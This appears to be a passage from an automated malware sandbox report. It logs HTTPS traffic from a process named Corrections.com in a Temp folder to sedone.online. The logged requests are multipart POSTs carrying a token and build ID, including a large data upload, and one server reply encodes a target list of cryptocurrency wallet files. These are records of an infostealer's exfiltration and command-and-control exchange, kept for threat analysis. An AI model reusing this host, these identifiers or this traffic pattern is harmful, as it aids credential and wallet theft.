                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:45 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:46 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  21192.168.2.449892116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC329OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DB1DBAIWTRQIE3E3OH4E
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 6990993
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 44 42 31 44 42 41 49 57 54 52 51 49 45 33 45 33 4f 48 34 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------DB1DBAIWTRQIE3E3OH4EContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------DB1DBAIWTRQIE3E3OH4ECont
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:46 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                  2024-12-17 16:29:54 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:53 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  22192.168.2.449897116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:48 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----UKNYC2VKNGV37Q9R9R9H
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:48 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 55 4b 4e 59 43 32 56 4b 4e 47 56 33 37 51 39 52 39 52 39 48 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------UKNYC2VKNGV37Q9R9R9HContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------UKNYC2VKNGV37Q9R9R9HCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:49 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:49 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-12-17 16:29:49 UTC2228INData Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47
                                                                                                                                                                                                                                                  Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  23192.168.2.449904116.203.12.1144437808C:\Users\user\AppData\Local\Temp\628056\Corrections.com
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-12-17 16:29:50 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----IWL6F3O8GLNYM79ZUK6X
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                  Host: sedone.online
                                                                                                                                                                                                                                                  Content-Length: 331
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  2024-12-17 16:29:50 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 57 4c 36 46 33 4f 38 47 4c 4e 59 4d 37 39 5a 55 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 36 31 30 61 31 39 61 35 30 39 39 33 64 31 39 38 32 33 35 62 61 63 65 65 35 66 36 30 34 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 57 4c 36 46 33 4f 38 47 4c 4e 59 4d 37 39 5a 55 4b 36 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 36 30 30 30 39 64 64 38 37 35 37 66 63 34 63 37 61 36 35 64 63 65 65 66 32 39 35 66 36 65 30 0d 0a 2d 2d 2d 2d 2d 2d 49 57 4c 36 46 33 4f 38 47 4c 4e 59 4d 37 39 5a 55 4b 36 58 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                  Data Ascii: ------IWL6F3O8GLNYM79ZUK6XContent-Disposition: form-data; name="token"7610a19a50993d198235bacee5f60466------IWL6F3O8GLNYM79ZUK6XContent-Disposition: form-data; name="build_id"960009dd8757fc4c7a65dceef295f6e0------IWL6F3O8GLNYM79ZUK6XCont
                                                                                                                                                                                                                                                  2024-12-17 16:29:51 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Date: Tue, 17 Dec 2024 16:29:51 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
